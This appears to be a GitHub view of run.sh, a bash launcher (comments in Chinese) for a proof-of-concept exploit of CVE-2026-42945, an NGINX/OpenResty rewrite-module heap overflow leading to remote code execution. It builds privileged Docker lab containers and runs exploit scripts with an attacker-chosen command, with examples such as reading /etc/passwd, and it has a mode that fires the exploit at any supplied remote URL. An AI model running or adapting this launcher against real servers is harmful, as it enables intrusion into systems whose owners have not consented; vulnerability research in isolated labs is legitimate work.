-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathrun.sh
More file actions
executable file
·103 lines (88 loc) · 3.24 KB
/
Copy pathrun.sh
File metadata and controls
executable file
·103 lines (88 loc) · 3.24 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
#!/bin/bash
# run.sh — CVE-2026-42945 PoC 一键测试入口
# 用法: ./run.sh <target> [command]
# target: nginx | openresty | http://host:port
# command: 要执行的命令 (默认: id)
set -e
RED='\033[91m'
GREEN='\033[92m'
YELLOW='\033[93m'
CYAN='\033[96m'
BOLD='\033[1m'
RESET='\033[0m'
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
TARGET="${1:-}"
CMD="${2:-id}"
usage() {
echo -e "${BOLD}CVE-2026-42945 NGINX Rewrite Module 堆溢出 → RCE${RESET}"
echo ""
echo "用法:"
echo " $0 <target> [command]"
echo ""
echo "target:"
echo " nginx 构建并启动 NGINX RCE 容器, 执行测试"
echo " openresty 构建并启动 OpenResty RCE 容器, 执行测试"
echo " http://... 直接测试已有目标 (需在容器内或有 root + ptrace)"
echo ""
echo "command:"
echo " 要执行的系统命令, 默认: id"
echo ""
echo "示例:"
echo " $0 nginx # 构建 NGINX + RCE: id"
echo " $0 openresty 'cat /etc/passwd' # 构建 OpenResty + RCE"
echo " $0 http://10.0.0.1:8775 id # 直接测试远程目标"
exit 1
}
if [ -z "$TARGET" ] || [ "$TARGET" = "-h" ] || [ "$TARGET" = "--help" ]; then
usage
fi
# ─── 模式一: Docker 构建 + 测试 ─────────────────────────
build_and_test() {
local SERVICE="$1"
local CONTAINER="$2"
local PORT="$3"
local IMAGE="cve-2026-42945-${SERVICE}"
echo -e "${CYAN}[*] 构建 ${SERVICE} 镜像...${RESET}"
cd "$SCRIPT_DIR/package"
docker compose build "$SERVICE" 2>&1 | tail -5
echo ""
# 清理旧容器
docker rm -f "$CONTAINER" 2>/dev/null || true
echo -e "${CYAN}[*] 启动 ${CONTAINER} 容器 (端口 ${PORT})...${RESET}"
docker run -d --name "$CONTAINER" --privileged -p "${PORT}:80" "$IMAGE" >/dev/null
# 等待 nginx 启动
sleep 2
echo -e "${CYAN}[*] 执行 RCE 测试...${RESET}"
echo ""
docker exec "$CONTAINER" bash /opt/rce.sh "$CMD"
echo ""
echo -e "${GREEN}[+] 容器持续运行中, 可继续测试:${RESET}"
echo -e " docker exec ${CONTAINER} bash /opt/rce.sh 'whoami'"
echo -e " docker exec ${CONTAINER} python3 /opt/exploit_rce.py -t http://127.0.0.1:80 -c 'uname -a'"
echo -e " docker rm -f ${CONTAINER} # 清理"
}
# ─── 模式二: 直接测试远程目标 ────────────────────────────
test_remote() {
local URL="$1"
echo -e "${CYAN}[*] 直接测试目标: ${URL}${RESET}"
echo -e "${YELLOW}[!] 需要 root 权限 + ptrace${RESET}"
echo ""
sudo python3 "$SCRIPT_DIR/scripts/exploit_rce.py" -t "$URL" -c "$CMD"
}
# ─── 主逻辑 ────────────────────────────────────────────
case "$TARGET" in
nginx)
build_and_test "nginx-rce" "nginx-rce" "8775"
;;
openresty)
build_and_test "openresty-rce" "openresty-rce" "8776"
;;
http://*|https://*)
test_remote "$TARGET"
;;
*)
echo -e "${RED}[-] 未知目标: ${TARGET}${RESET}"
echo " 请输入 nginx / openresty / http://host:port"
exit 1
;;
esac